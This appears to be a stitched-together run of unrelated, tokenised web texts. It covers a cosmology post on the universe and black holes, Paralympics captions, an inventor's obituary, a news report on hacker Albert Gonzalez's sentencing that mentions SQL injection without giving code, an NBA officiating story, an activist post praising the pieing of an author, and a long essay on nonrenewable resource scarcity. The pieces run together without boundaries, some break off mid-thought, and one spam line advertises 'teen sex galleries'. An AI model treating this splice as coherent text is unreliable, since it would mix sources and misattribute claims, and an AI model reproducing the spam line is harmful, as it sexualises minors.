The spacetime solution to Einstein 's equation that describes a universe expanding from the Big Bang is very similar to the time - reversal of a black hole , but you do n't really learn much from making that statement , especially because there is no outside ; everything you wanted to know was already there in the original cosmological language .
Our universe is not going to collapse to a future singularity , even though the mass is enough to allow that to happen , simply because it 's expanding ; the singularity you 're anticipating already happened .
Still , some folks will stubbornly insist , there has to be something deep and interesting about the fact that the radius of the observable universe is comparable to the Schwarzschild radius of an equally - sized black hole .
And there is !
It means the universe is spatially flat .
You can figure this out by looking at the Friedmann equation , which relates the Hubble parameter to the energy density and the spatial curvature of the universe .
The radius of our observable universe is basically the Hubble length , which is the speed of light divided by the Hubble parameter .
It ’s a straightforward exercise to calculate the amount of mass inside a sphere whose radius is the Hubble length ( M = 4 π c3H - 3/3 ) , and then calculate the corresponding Schwarzschild radius ( R = 2GM / c2 ) .
You will find that the radius equals the Hubble length , if the universe is spatially flat .
Voila !
Note that a spatially flat universe remains spatially flat forever , so this is n't telling us anything about the universe now ; it always has been true , and will remain always true .
It 's a nice fact , but it does n't reveal anything about the universe that we did n't already know by thinking about cosmology .
Who wants to live inside a black hole , anyway ?
Over 500 athletes from 44 countries around the world have once again descended on Vancouver Canada , for the 2010 Vancouver Winter Paralympic Games , ( officially known as the X Paralympic Winter Games ) .
After a separate torch relay and opening ceremony , competitors faced off in five different sports : Sledge hockey , Wheelchair curling , Alpine skiing , Biathlon , and Cross - country skiing - the last three broken into classes of sitting , standing and visually impaired .
Currently Russia is leading the medals race , with Canada and Ukraine tied for second place .
The Winter Paralympics continue until the Closing Ceremony on Sunday March 21st .
Collected here are some scenes from this year 's games .
( 40 photos total
Ronald Howes was an inventor — developing high - tech stuff like defense weaponry and electrostatic printers — whose most famous contribution was the iconic Easy - Bake Oven .
He passed away on Tuesday , at the age of 83 .
[ Cincinnati News ]
Advertisement
Albert Gonzalez blamed " curiosity and addiction " for his crimes Computer hacker Albert Gonzalez has been jailed for 20 years in the US for his part in stealing the details of more than 130 m credit and debit cards .
One judge described the crime as " the largest and most costly example of computer hacking in US history " .
The 28 - year - old pleaded guilty to three cases of fraud at his trial last year .
Gonzalez was sentenced to 20 years for the first two cases on Thursday , and 20 years and one day on Friday for the third .
The terms will run concurrently .
The judge in the third case said he had to serve the extra 24 years because the crime had been committed when he was working for the US Secret Service as an informant , reportedly receiving as much as $ 75,000 a year .
As part of a plea agreement , Gonzalez also agreed to hand over $ 1 m that he had buried in his parents ' garden , a condo in his hometown of Miami , a car , a diamond ring and several expensive watches .
' Powerful message ' Gonzalez was accused last August , along with two Russian co-conspirators , of hacking into the payment systems of retailers .
Hackers continue to put up a persistent and very real threat to enterprise systems
Amichai Shulman
Imperva
They targeted more than 250 US companies including payment processor Heartland Payment Systems , food and drink store 7 - Eleven and American supermarket Hannaford Brothers Co. Gonzalez was found to have used SQL injection attacks to exploit weaknesses in payment software programmes and access data , stealing millions of customer card details .
He blamed " curiosity and addiction " for his crimes .
Assistant Attorney General Lanny Breuer of the Department of Justice said that on a daily basis " cyber criminals try to steal the debit and credit card numbers of unsuspecting American consumers . "
" These sentences - some of the longest ever imposed for hacking crimes - send a powerful message to hackers around the globe that US law enforcement will not allow them to breach American computer networks and payment systems , or illegally obtain identities . "
Amichai Shulman , chief technology officer of cyber security firm Imperva , warned that hackers " continue to put up a persistent and very real threat to enterprise systems " .
" The current data security spend is focused on enterprise networks , yet the Gonzalez attacks took distinct advantage of weaknesses in the database and applications .
This is an industry - wide problem . "
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
OKLAHOMA CITY --
The NBA announced Wednesday officials missed a foul in the final seconds of Utah 's overtime victory over Oklahoma City the previous night .
" On the final play of last night 's Oklahoma City - Utah game , the officials missed a foul committed by the Jazz's C.J. Miles on the Thunder 's Kevin Durant during a 3 - point shot attempt , " NBA president of league and basketball operations Joel Litvin said in a statement .
Deron Williams ' jumper with 1.1 seconds left in the overtime gave the Jazz a 140 - 139 lead and Miles clinched the win with a block on Durant 's shot at the buzzer .
Durant believed he was fouled and he and several teammates stayed on the court pleading for a call that never came before the officials were escorted to the tunnel by security .
Durant , a 90 percent foul shooter , would have shot three free throws with a chance to put the Thunder ahead with less than a second to play had a foul been called .
The loss knocked Oklahoma City into the No. 7 seed in the Western Conference entering Wednesday .
" Somebody has to lose the great games in order for it to be a great game , and unfortunately we lost .
...
There 's a lot of games that we won the tough games and that one , we lost , " Oklahoma City coach Scott Brooks said .
" We did n't get the stop at the very end of the game , regardless of the play at the end . "
The missed call came four days after Kevin Garnett of the Boston Celtics was fined $ 25,000 for criticizing officials for calling fouls against Durant 's defenders as though he were Michael Jordan -- and using a profanity during that criticism .
" I think referees are great at what they do , " Brooks said .
" I 've talked to them as a player .
I 've always had good relationships with them and I still do .
One of the things that they do , and they do it well , is they call the game the same whether it 's the first minute or the last minute of the game .
" They have a tough job .
It 's a tough job to be able to make the correct call and they do it high - 90 percent of the time . "
Jazz coach Jerry Sloan could not recall a specific instance when the league acknowledged an officiating mistake after the fact -- though it has happened during each of the last two postseasons .
" That 's part of basketball , " Sloan said before Utah 's game in Houston .
" I do n't think you can spend all your time worrying about that .
Once it 's over , you might be upset a little bit at the moment , but life goes on .
You can't do anything about it . "
Sloan said he 's put the ending and the controversial ending behind him .
" I do n't know if it benefits you to continue to harp on it , or talk about it , " he said .
" The job now is to forget about that , and that 's what you try to teach guys .
Forget about the game last night , because you 're going to have to play a different team in a different setting , different situation . "
When he looked back at the tape of the game , Brooks said he questioned his team 's decision not to foul prior to Williams ' game - winning shot .
The Jazz were not in the bonus and would not have shot free throws .
" We had a chance to foul and we did not do that .
I do n't know if that would have changed him from making his shot , but we did n't get the stop , " Brooks said .
Bound Together Books and PM
Press continue to try to prop up and foist veg*n antagonist Lierre Keith onto the radical community in the Bay Area .
Today , at the 15th Annual San Francisco Anarchist Bookfair , where she was scheduled to be a featured speaker , Keith was served her just deserts for her obnoxious attacks on veg*ns in The Vegetarian Myth .
She was pied in the middle of her speech in the main auditorium at the SF County Fair Building in Golden Gate Park .
The myriad logical fallacies and other personal , logical , and factual problems with Lierre Keith 's misanthropic book need not be reiterated here .
A thorough debunking of her attack on veg*ns was posted on Indybay last June when Bound Together Books first invited her to speak about her book .
Lierre Keith's Elaborate , Self - Congratulatory Excuse for Abandoning VeganismIf her book had been written as a good faith effort to start a discussion about the topics of vegetarianism and industrial agriculture , it certainly would not have evoked such a visceral reaction from veg*ns .
But that 's not how Keith addressed the subject .
She instead chose to rebuke her own former vegan self by verbally assaulting all veg*ns , calling them ignorant and child - like , sometimes based on nothing more than dishonest accounts of anonymous online comment threads or her own self - loathing .
Phony environmentalist omnivores like her buddy Derrick Jensen -- who farcically claimed the " book saved my life ” -- might find the gratuitous attacks on veg*ns self - satisfying or validating , but the insults and invective directed against veg*ns have been taken , not surprisingly , quite personally by veg*ns everywhere who are aware of the book , sometimes by having had it thrown in their faces by those who mistakenly believe the book to be the last word on vegetarianism .
And surely it was a reaction to these attacks that led the culprits of the pieing to feel compelled to take symbolic action against Lierre Keith at the very moment she was being held up as a paragon of radical thought by Bound Together Books at this year 's Anarchist Bookfair , normally a vegetarian - friendly venue .
Some will condemn the pieing as a useless symbolic action .
Others will object to the breaking of decorum at the bookfair .
Many of those who might condemn the action would not think twice about praising other symbolic direct actions , pieing or otherwise .
It is doubtful if her book were " the anarchist myth " or " prison activist myth " that anyone present would do anything but cheer the action .
Some will undoubtedly argue that the pieing was an attack on free speech , but Keith has been afforded more speech than most people on the planet will ever be , courtesy of PM Press .
In fact , she is profiting from the soap box she has been given to pretend she is a radical environmentalist who just happens to jet around the country to and from her home in rural Massachusetts .
In a world where vegans and vegetarians are a definite minority , face constant bombardment with pro-meat messages our American cattle culture , and frequently have to deal with direct attacks from government law enforcement , and multinational corporations that profit from the sale of factory - farmed meat and dairy , Ramsey Kanaan of PM
Press , himself a long - time vegan , strangely chose to pile on with yet another attack on veg*ns , this time being especially traumatic in that it comes from the inside of the supposed radical environmental movement .
( Was the book printed in part to curry favor with Derrick Jensen who now publishes through PM Press ? )
Through the Bound Together collective , of which Ramsey Kanaan is a member , Lierre Keith has been asked to speak in the Bay Area repeatedly .
The mean - spirited book and these speaking engagements are largely one - way conversations with Keith dominating the dialogue .
But today , anonymous masked peoples stood up and refused to allow PM Press and Bound Together to yet again try to cram Lierre Keith down our throats .
They stood up for many who have suffered silently , without a voice , since the publication of her book .
We do n't want what you are serving .
Have you enjoyed Nikki's Playmates 's Nude Picture ?
See more teen sex galleries
“ Entrepreneurs should not be the targets , ” he said .
“ Entrepreneurship needs to be encouraged – not penalised and driven out of the country .
Entrepreneurs take personal and financial risk and create employment and enterprise .
We have to be careful because it would n’t take a lot for us to slip back into recession and that ’s before the effect of inflation on the economy . ”
At the end of the day , we are not about to “ run out ” of any NNR ; we are about to run “ critically short ” of many .
This reality will have a devastating impact on our industrial lifestyle paradigm .
The salient findings associated with the assessment : 50 of the 57 analyzed NNRs ( 88 % ) experienced global scarcity during the 2000 - 2008 period ; 23 of the 26 analyzed NNRs ( 88 % ) will likely experience permanent global supply shortfalls by the year 2030 .
The Global Nonrenewable Natural Resource Scarcity Assessment quantifies the scope associated with global NNR scarcity , both prior to the Great Recession and going forward , by analyzing global production ( extraction ) data , price data , and reserve base estimates associated with a broad array of energy resources , metals , and minerals .
Global NNR scarcity will intensify going forward , as global economic activity levels , economic growth rates , and corresponding NNR demand return to their pre-recession levels ; and global NNR supply levels continue to approach and reach their geological limits .
The debilitating societal effects associated with global NNR scarcity , which we experienced to a limited degree during the Great Recession , will also intensify going forward , as temporary global NNR supply shortfalls become permanent .
During the pre-recession years of the 21st century , we experienced wide - ranging nonrenewable natural resource ( NNR ) scarcity on a global scale for the first time .
Supplies associated with an overwhelming majority of the global energy resources , metals , and minerals that enable our industrialized way of life failed to keep pace with increasing global demand during the 2000 - 2008 period , resulting in global NNR supply shortfalls .
This is a guest post by Chris Clugston .
It is a somewhat abbreviated version of a longer analysis he did , which can be downloaded here .
For the past four years , he has been researching aspects of sustainability .
Prior to that time , he worked for 30 years as an executive and consultant in Information Technology .
Introduction
Nonrenewable Natural Resources — the Enablers of Industrialization
Our industrial1 lifestyle paradigm is enabled by nonrenewable natural resources ( NNRs ) — energy resources , metals , and minerals .
Both the support infrastructure within industrialized nations and the raw material inputs into industrialized economies consist almost entirely of NNRs ; NNRs are the primary sources of the tremendous wealth surpluses required to perpetuate industrialized societies .
As a case in point , the percentage of NNR inputs into the US economy increased from less than 10 % in the year 1800 , which corresponds roughly with the inception of the American industrial revolution , to approximately 95 % today .
2,3 Between 1800 and today , America ’s total annual NNR utilization level increased from approximately 4 million tons to nearly 7 billion tons — an increase of over 1700 times !
4
In the absence of enormous and ever - increasing NNR supplies , the 1.2 billion people5 who currently enjoy an industrialized way of life will cease to do so ; and the billions of people aspiring to an industrialized way of life will fail to realize their goal .
NNR Scarcity
As their name implies , NNRs are finite — they are not replenished by Nature ; 6 and they are scarce — economically viable NNR deposits are rare .
Persistent extraction ( production ) will therefore deplete recoverable NNR reserves to exhaustion .
[ Note : the terms NNR “ production ” and NNR “ extraction ” are used interchangeably throughout the paper .
Although “ extraction ” is the proper term — humans do not produce NNRs — the term “ production ” has gained wide acceptance within the NNR extraction industries . ]
The typical NNR depletion cycle7 is characterized by :
Figure 1
a period of “ continuously more and more ” , as the easily accessible , high quality , low cost resources are extracted ; followed by a “ supply peak ” , 8 or maximum attainable extraction level ; followed by a period of “ continuously less and less ” , as the less accessible , lower quality , higher cost resources are extracted .
Since the inception of our industrial revolution , humanity has been the beneficiary of “ continuously more and more ” with respect to available NNR supplies .
Unfortunately , in the process of reaping the benefits associated with “ continuously more and more ” , we have been eliminating — persistently and systematically — the very natural resources upon which our industrialized way of life depends .
Increasingly , global NNR supplies are transitioning from “ continuously more and more ” to “ continuously less and less ” , as they peak and go into terminal decline .
As a result , NNRs are becoming increasingly scarce — ever - tightening global NNR supplies are struggling to keep pace with ever - increasing global demand .
The Analyses
The following Global Nonrenewable Natural Resource Scarcity Assessment quantifies the magnitude associated with increasing global NNR scarcity and the probabilities associated with imminent and permanent global NNR supply shortfalls .
The assessment consists of two analyses , both of which are based on US Geological Survey ( USGS ) and US Energy Information Administration ( EIA ) data.9
The Global NNR Scarcity Analysis assesses the incidence of global scarcity associated with each of 57 NNRs during the period of global economic growth ( 2000 - 2008 ) prior to the Great Recession .
assesses the incidence of global scarcity associated with each of 57 NNRs during the period of global economic growth ( 2000 - 2008 ) prior to the Great Recession .
The Global NNR Supply Shortfall Analysis assesses the probability of a permanent global supply shortfall associated with each of 26 NNRs between now and the year 2030 .
Summary Findings
Global NNR Scarcity Analysis Summary Findings
Fifty ( 50 ) of the 57 analyzed NNRs ( 88 % ) experienced some level of global scarcity during the period of global economic growth ( 2000 - 2008 ) that preceded the Great Recession .
Figure 2
Global NNR Supply Shortfall Analysis Summary Findings
Twenty three ( 23 ) of the 26 analyzed NNRs ( 88 % ) will likely experience a permanent global NNR supply shortfall by the year 2030 .
Figure 3
Global NNR Scarcity Analysis
The Global NNR Scarcity Analysis is based on US Geological Survey ( USGS ) and US Energy Information Administration ( EIA ) data related to global production and pricing associated with fifty seven ( 57 ) NNRs — energy resources , metals , and minerals .
Global NNR Scarcity
Figure 4
In a general sense , NNR scarcity exists when aggregate NNR supply is insufficient to meet aggregate NNR demand ; the result is unfulfilled NNR demand .
Ongoing NNR scarcity is characterized by an increasing NNR price level , which fails to induce sufficient incremental NNR supply to suppress the price level .
Global NNR Scarcity Analysis Overview
The Global NNR Scarcity Analysis assesses the incidence of global scarcity associated with 57 NNRs during the period of global economic growth ( 2000 - 2008 ) prior to the Great Recession .
Specifically , the analysis compares annual global NNR production data and NNR pricing data10 from the 20th century with that of the pre-recession 21st century ( 2000 - 2008 ) .
NNRs considered “ scarce ” during the 2000 - 2008 period are those for which 21st century global NNR production levels were insufficient to suppress rising 21st century price levels .
NNR scarcity levels are defined by the following NNR production level and price level combinations :
Figure 5
Global NNR Scarcity Assessment
The following table contains 20th century and 21st century global production trend data and price trend data for each of the 57 analyzed NNRs .
Specifically , it contains the compound annual growth ( decline ) rates associated with global NNR production levels and NNR price levels during the 20th century and 21st century ( 2000 - 2008 ) .
The table also notes the level of scarcity experienced by each NNR during the 2000 to 2008 time period .
( See Appendix A : Global NNR Scarcity Probability Detail . )
Figure 6
Macro Level Global NNR Scarcity Assessment
During the 20th century , global production levels associated with 56 of the 57 analyzed NNRs ( 98 % ) increased annually , while global price levels associated with 45 of the 57 analyzed NNRs ( 79 % ) decreased annually .
Generally increasing global NNR production levels in conjunction with generally decreasing global NNR price levels indicate relative global NNR abundance during the 20th century .
On the whole , global NNR supplies kept pace with ever - increasing global demand during the 20th century .
During the pre-recession years of the 21st century ( 2000 - 2008 ) , annual global production level growth rates associated with 34 of the 57 analyzed NNRs ( 59 % ) decreased in comparison to 20th century growth rates , or actually went negative ; while annual global price level growth rates associated with 51 of the 57 analyzed NNRs ( 89 % ) increased in comparison to 20th century growth rates .
Generally slowing or declining global NNR production growth in conjunction with generally increasing global NNR prices indicate increasing NNR scarcity during the early years of the 21st century — annual global NNR supplies were increasingly unable to keep pace with ever - increasing global demand .
Global NNR Scarcity Analysis Findings
An overwhelming majority ( 88 % ) of the analyzed NNRs — 50 out of 57 — experienced some level of global scarcity during the pre-recession years of the 21st century ; available global supplies associated with these NNRs could not keep pace with demand during the 2000 - 2008 period .
At issue is whether this phenomenon is temporary or permanent .
In some cases , global NNR scarcity during the early 21st century was undoubtedly a temporary phenomenon .
Sufficient additional NNR reserves existed to fulfill global requirements ; but they could not be produced quickly enough to keep pace with ever - increasing demand — possibly due to geopolitical constraints or to the lack of sufficient capital investment .
Remaining supplies associated with these NNRs will be sufficient to contribute toward the complete restoration of pre-recession global economic activity levels and growth rates ( this time ) .
In other cases , global NNR scarcity is a permanent condition ; available NNR supplies were physically ( geologically ) unable to keep pace with ever - increasing demand during the 2000 - 2008 period .
Remaining supplies associated with these NNRs are no longer sufficient to contribute fully toward pre-recession global economic activity levels and growth rates .
Given that industrialized and industrializing nations will attempt to recover from the Great Recession as quickly as possible — thereby restoring or exceeding pre-recession economic activity levels and growth rates — it will soon become evident which NNRs experienced temporary global scarcity during the early 21st century and which experienced permanent global scarcity .
It will certainly become evident that an increasing number of NNRs are becoming increasingly scarcity globally , as ever - tightening global NNR supplies fail increasingly to keep pace with relentlessly increasing global NNR demand .
And while we may recover fully from the Great Recession , permanent global NNR supply shortfalls will preclude our full recovery from a subsequent global economic contraction at some point in the not - too - distant future .
Global NNR Shortfall Analysis
The Global NNR Supply Shortfall Analysis is based on US Geological Survey ( USGS ) and US Energy Information Administration ( EIA ) global NNR extraction data and ( Verhulst ) logistics curve fitting analyses11 associated with 26 NNRs .
Global NNR Supply Shortfalls
Figure 7
An NNR supply shortfall occurs when the available NNR supply level is less than the supply level required to enable a society ’s prevailing economic activity level and growth rate .
An NNR supply shortfall can be temporary , permanent , or fatal .
A temporary NNR supply shortfall occurs when the available NNR supply level falls below the “ required ” supply level for a finite period of time .
Since the available NNR supply level ultimately recovers to the required level , the society ’s pre-shortfall economic activity level and growth rate are restored .
A permanent NNR supply shortfall occurs when the available NNR supply level falls below the “ required ” supply level forever .
Since the available NNR supply level never recovers to the required level , the society ’s pre-shortfall economic activity level and growth rate are not restored .
A fatal NNR supply shortfall occurs when the available NNR supply level falls below the “ critical ” supply level forever .
At this point , available NNR supply can no longer enable the production and provisioning of one or more societal essentials — clean water , food , energy , shelter , clothing , and infrastructure — at levels sufficient to support the society ’s existing population .
Global NNR Supply Shortfall Analysis Overview
The Global NNR Supply Shortfall Analysis assesses the probability of permanent global supply shortfalls associated with 26 NNRs between now and the year 2030 .
Specifically , the analysis compares historic and projected annual global NNR extraction levels associated with each NNR through the year 2030 , with the actual or projected peak extraction level associated with the NNR .
An imminent and permanent global NNR shortfall is considered probable if the annual global NNR extraction level has already reached its global peak extraction level , or if the projected annual global NNR extraction level is expected to reach its projected global peak extraction level by the year 2030 .
The probabilities that an NNR will experience a permanent global supply shortfall by the year 2030 are defined as follows :
Nearly Certain Probability : it is very likely that the actual annual global NNR extraction level reached its geological global peak extraction level prior to the year 2010 .
Very High Probability : the actual annual global NNR extraction level exceeded its projected ( Verhulst ) global peak extraction level prior to the year 2010 .
High Probability : it is very likely that the projected annual global NNR extraction level will exceed its projected ( Verhulst ) global peak extraction level between the years 2010 and 2030 .
Low Probability : it is very unlikely that the projected annual global NNR extraction level will exceed its projected ( Verhulst ) global peak extraction level prior to the year 2030 .
Global NNR Supply Shortfall Assessment
The following table contains current ( 2007/2008 ) annual global NNR extraction level data , year 2030 global NNR extraction level estimates , and global peak NNR extraction level estimates for each of the 26 analyzed NNRs .
12
The table also notes the probability that each of the 26 NNRs will experience a permanent global supply shortfall by the year 2030 .
Figure 8
Twenty three ( 23 ) of the 26 analyzed NNRs ( 88 % ) will likely experience permanent global NNR supply shortfalls by the year 2030 — available global supplies associated with these NNRs will fail permanently to meet global NNR demand by that time .
Specifically :
Actual annual global extraction levels associated with cadmium , gold , mercury , tellurium , and tungsten have likely reached their geological global peak extraction levels , and are in terminal decline worldwide .
The probability that these NNRs will experience permanent global supply shortfalls by the year 2030 is nearly certain , assuming near term recoveries to pre-recession NNR extraction levels and growth rates , and the continued inability of recycled NNRs to more than offset ever - tightening newly extracted supplies .
13
Actual annual global extraction levels associated with cobalt , lead , molybdenum , PGM , phosphate rock , silver , titanium , and zinc exceeded their projected Verhulst global peak extraction levels prior to the year 2010 .
Current annual global extraction levels associated with these NNRs are likely near or at their geological global peak extraction levels .
The probability that these NNRs will experience permanent global supply shortfalls by the year 2030 is very high , assuming near term recoveries to pre-recession NNR extraction levels and growth rates , and the continued inability of recycled NNRs to more than offset ever - tightening newly extracted supplies .
13
Actual annual global extraction levels associated with chromium , coal , copper , indium , iron ore , lithium , magnesium compounds , natural gas , nickel , oil , and phosphate rock are expected to exceed their projected Verhulst global peak extraction levels between the years 2010 and 2030 .
The probability that these NNRs will experience permanent global supply shortfalls by the year 2030 is high , assuming near term recoveries to pre-recession NNR extraction levels and growth rates , and the continued inability of recycled NNRs to more than offset ever - tightening newly extracted supplies .
13
Actual annual global extraction levels associated with bauxite , rare earth minerals , and tin are not expected to exceed their projected Verhulst global peak extraction levels prior to the year 2030 .
The probability that these NNRs will experience permanent global supply shortfalls by the year 2030 is low , unless future NNR extraction levels and growth rates far exceed pre-recession extraction levels and growth rates , due to unforeseen increases in global demand .
Note that national and / or regional NNR supply shortfalls should be expected to occur , primarily for geopolitical reasons , 14 even though global NNR supplies remain at sufficient levels to fully address global demand .
Global NNR Supply Shortfall Analysis Findings
Fifty ( 50 ) of the 57 NNRs ( 88 % ) analyzed in the Global NNR Scarcity Analysis experienced global scarcity — and therefore experienced temporary ( at least ) global supply shortfalls — during the 2000 - 2008 period .
Twenty three ( 23 ) of the 26 NNRs ( 88 % ) analyzed in the Global NNR Supply Shortfall Analysis are likely to experience permanent global supply shortfalls by the year 2030 .
Each permanent NNR supply shortfall represents another crack in the foundation of our globalizing industrial lifestyle paradigm ; at issue is which crack or combination of cracks will cause the structure to collapse ?
Permanent global supply shortfalls associated with a single critical NNR or with a very few secondary NNRs can be sufficient to cause significant lifestyle disruptions — population level reductions and / or material living standard degradation .
A permanent shortfall in the global supply of oil , for example , would be sufficient to cause significant local , national , and / or global lifestyle disruptions , or outright global societal collapse ; as would permanent global supply shortfalls associated with 2 - 3 critical NNRs such as potassium , phosphate rock , and ( fixed ) nitrogen ; as would concurrent permanent global supply shortfalls associated with 4 - 5 secondary NNRs such as the alloys , catalysts , and reagents that enable the effective use of critical NNRs.15
Given our vulnerability to an ever - increasing number of imminent and permanent global NNR supply shortfalls , the likelihood that the mix and volume of shortfalls will reach their “ critical mass ” is a question of “ when ” , not “ if ” .
Implications of Increasing Global NNR Scarcity
Increasing NNR Scarcity
Available supplies associated with an overwhelming majority of NNRs — including bauxite , copper , iron ore , magnesium , manganese , nickel , phosphate rock , potash , rare earth metals , tin , and zinc — have reached their domestic US peak extraction levels , and are in terminal decline .
16 Based on the evidence presented above , available supplies associated with a vast majority of NNRs are becoming increasingly scarce globally as well .
Figure 9
Because global NNR supplies are transitioning from “ continuously more and more ” to “ continuously less and less ” , our global societal wellbeing levels — our economic activity levels , population levels , and material living standards — are transitioning from “ continuously more and more ” to “ continuously less and less ” as well .
America — an Example of “ Advanced ” NNR Scarcity
A US NNR Scarcity Analysis was conducted to assess the incidence of NNR scarcity associated with fifty eight ( 58 ) NNRs in the United States .
17
The salient findings :
Annual US production levels associated with 50 of the 58 analyzed NNRs have reached their geological US peak production levels ;
Twenty five ( 25 ) of the 58 analyzed NNRs are no longer being produced in the US at all ;
The US currently imports some quantity of 46 of the 58 analyzed NNRs ; and
For 18 of the 58 analyzed NNRs , the US imports 100 % of its current annual utilization level .
America has been able to supplement its continuously decreasing domestic NNR production levels — thereby forestalling fatal NNR supply shortfalls — by :
Importing ever - increasing quantities of NNRs from foreign nations ;
Outsourcing US manufacturing operations to foreign offshore locations , thereby utilizing foreign NNRs ; and
Becoming a net importer of foreign goods and services , thereby utilizing foreign NNRs throughout the product / service production and provisioning processes .
Increasing Global NNR Scarcity
So long as 1.2 billion people seek to perpetuate their industrialized lifestyles and billions more actively aspire to an industrialized way of life , global NNR requirements and demand levels will increase unabated — while ever - tightening NNR supplies will continue to approach and reach their global peak levels .
The result of this demand / supply imbalance is a fundamental shift in the relationship among global NNR demand levels , supply levels , and utilization levels .
Figure 10
We are evolving from a “ demand driven ” NNR utilization paradigm in which our NNR utilization levels are determined by ever - increasing NNR demand , which is always met with ever - increasing supplies ; to a “ supply constrained ” NNR utilization paradigm in which our NNR utilization levels will be determined by continuously decreasing NNR supplies , which will fail increasingly to keep pace with demand .
While the US has been able to rely on foreign NNR sources to offset its continuously decreasing domestic NNR production levels , the world has no such “ safety net ” — there is only one earth .
Footnotes
(1) The term “ industrial ” as used here includes all post - agrarian societal designations such as “ post - industrial ” , “ advanced ” , “ modern ” , and “ developed ” ; all of which describe human populations that rely heavily upon nonrenewable natural resources .
(2) Estimated US nonrenewable materials ( minerals ) as a percentage of total US mineral utilization in the year 1800 : US per capita mineral use in 1800 was ~ 1500 lbs .
- http://www.mii.org/pdfs/Minerals1776vsToday.pdf.
Total US energy consumption in 1800 was .47 quadrillion BTUs , all generated from biomass [ wood ] - http://www.eia.doe.gov/emeu/aer/txt/stb1701.xls.
Given that the energy content of wood averages ~ 20 million BTUs per cord - http://hearth.com/econtent/index.php/articles/heating_value_wood, ~23.5 million cords of wood were used that year for “ energy generation ” purposes alone ; this equates to ~ 4.43 cords / person on average , given an 1800 US population of 5.3 million - http://www.measuringworth.com/.
A cord of hardwood weighs ~ 5000 lbs. ; a cord of soft wood weighs ~3000 lbs - http://www.csgnetwork.com/logweight.html; assuming only 3,000 lbs./ cord , the 4.43 cords / person equates to 13,300 lbs. of energy - related wood use per capita in 1800 .
The 13,300 lbs. figure does not include wood used for building and construction purposes ; nor does it include agricultural material flows into the economy that year .
Even so , the 1,500 lbs. of mineral use combined with the 13,300 lbs. of energy - related wood use produce a total of nearly 15,000 lbs. of material resources used per person in 1800 , of which approximately 90 % were renewable .
It can be readily asserted that with the inclusion of “ non-energy ” wood use and agricultural material use , well over 90 % of the material resources flowing into the US economy in 1800 were renewable ; less than 10 % were nonrenewable .
(3) Estimated US nonrenewable materials ( minerals ) as a percentage of total US mineral utilization in the year 2007 : the 2006 percentage of renewable materials flowing into the US economy from the Wagner USGS study was ~ 5 % ( see “ the Mineral Mountain ” and pgs. 20 - 24 ) ; nonrenewables accounted for approximately 95 % of the materials flowing into the US economy that year ; “ Economic Drivers of Mineral Supply ” , Lori Wagner et al. , USGS , 2002 - http://pubs.usgs.gov/of/2002/of02-335/of02-335.pdf.
( 4 ) 2008 data from “ 2008 Mineral Baby ” , Mineral Information Institute , 2009 - http://www.mii.org/pdfs/2009miiMineralsBaby.pdf; 1800 data from “ The American Lifestyle ” , pg. 3 ( 1776 estimate of 1200 pounds per capita extrapolated to 1500 pounds per capita in 1800 ) ; Mineral Information Institute , 2006 - http://www.mii.org/pdfs/Minerals1776vsToday.pdf.
(5) Lawrence Smith estimates that 1.2 billion people currently reside in industrialized countries ; from “ Growth and Dispersal : A Planet on the Move ” , ( The Population Institute ) , 2006 - .
(6) The term “ Nature ” , as used here , refers to the inestimable number of physical , chemical , geological , and biological processes and phenomena that define the physical world in which we live ; neither consciousness nor a physical manifestation is attributed to “ Nature ” .
(7) Colin Campbell explains the depletion function associated with nonrenewable natural resources and provides examples pertaining to oil depletion in “ The Coming Oil Crisis ” , pgs. 95-97 ; Colin J. Campbell , Multi-Science Publishing Company & Petroconsultants S.A ; 1988 .
(8) “ Peak ” NNR production ( extraction ) does not imply imminent “ exhaustion ” .
At peak , approximately half of the ultimately recoverable resource still remains to be extracted .
The post - peak half of the resource is simply increasingly more energy - intensive , resource - intensive , and financially expensive to extract than the pre-peak half .
(9 ) Global NNR Scarcity Analysis and Global NNR Supply Shortfall Analysis data sources :
“ Mineral Commodity Summaries 2009 ” , USGS , 2009 - http://minerals.usgs.gov/minerals/pubs/mcs/2009/mcs2009.pdf;
“ Mineral Commodity Summaries ( history ) ” , USGS , 2009 - http://minerals.usgs.gov/minerals/pubs/mcs/;
“ Historical Statistics for Mineral and Material Commodities in the United States ” , USGS , 2009 - http://minerals.usgs.gov/ds/2005/140/;
“ Estimated Primary Energy Consumption in the United States , Selected Years , 1635 - 1945 ” , EIA - http://www.eia.doe.gov/emeu/aer/txt/stb1701.xls;
“ Primary Energy Consumption by Source ” , 1949- 2008 ” , EIA - http://www.eia.doe.gov/emeu/aer/txt/ptb0103.html;
“ World Primary Energy Production by Source , 1970 - 2006 ” - http://www.eia.doe.gov/emeu/aer/txt/ptb1101.html;
“ Crude Oil Production and Crude Oil Well Productivity , 1954 - 2008 ” , EIA - http://www.eia.doe.gov/emeu/aer/txt/stb0502.xls;
“ Petroleum Overview , 1949 - 2008 ” , EIA - http://www.eia.doe.gov/emeu/aer/txt/stb0501.xls
“ Natural Gas Overview , 1949 - 2008 ” , EIA - http://www.eia.doe.gov/emeu/aer/txt/stb0601.xls;
“ Coal Overview , 1949 - 2008 ” , EIA - http://www.eia.doe.gov/emeu/aer/txt/stb0701.xls;
“ Crude Oil Domestic First Purchase Prices , 1949 - 2008 , EIA - http://www.eia.doe.gov/emeu/aer/txt/stb0518.xls;
“ Natural Gas Wellhead , City Gate , and Import Prices , 1949 - 2008 ” , EIA - http://www.eia.doe.gov/emeu/aer/txt/stb0607.xls;
“ Coal Prices , 1949 - 2008 ” , EIA - http://www.eia.doe.gov/emeu/aer/txt/stb0708.xls;
“ World Proved Reserves of Oil and Natural Gas , Most Recent Estimates ” , EIA , 3 March 2009 ( I used arithmetic averages ) - http://www.eia.doe.gov/emeu/international/reserves.html; worldwide coal reserves range from 662 BST ( Rutledge ) to 930 BST ( EIA ) — I took the average ;
“ World Energy Use ( 2003 ) ” , Arthur Smith , 2005 ( year 1900 data ) - http://www.altenergyaction.org/mambo/index2.php?option=com_content&do_pdf=1&id=11
“ On American Sustainability ” , pgs. 45 - 48 ; Chris Clugston , 2009 - http://www.wakeupamerika.com/PDFs/On-American-Sustainability.pdf.
“ Minerals Depletion ” , Dr. L. David Roper , 2010 - http://www.roperld.com/science/minerals/minerals.htm.
“ Compound Interest Calculator - http://www.1728.com/compint.htm;
“ The Inflation Calculator ” - http://www.westegg.com/inflation/infl.cgi.
( 10 ) All price levels are inflation adjusted to year 2000 USD using “ The Inflation Calculator ” - http://www.westegg.com/inflation/infl.cgi.
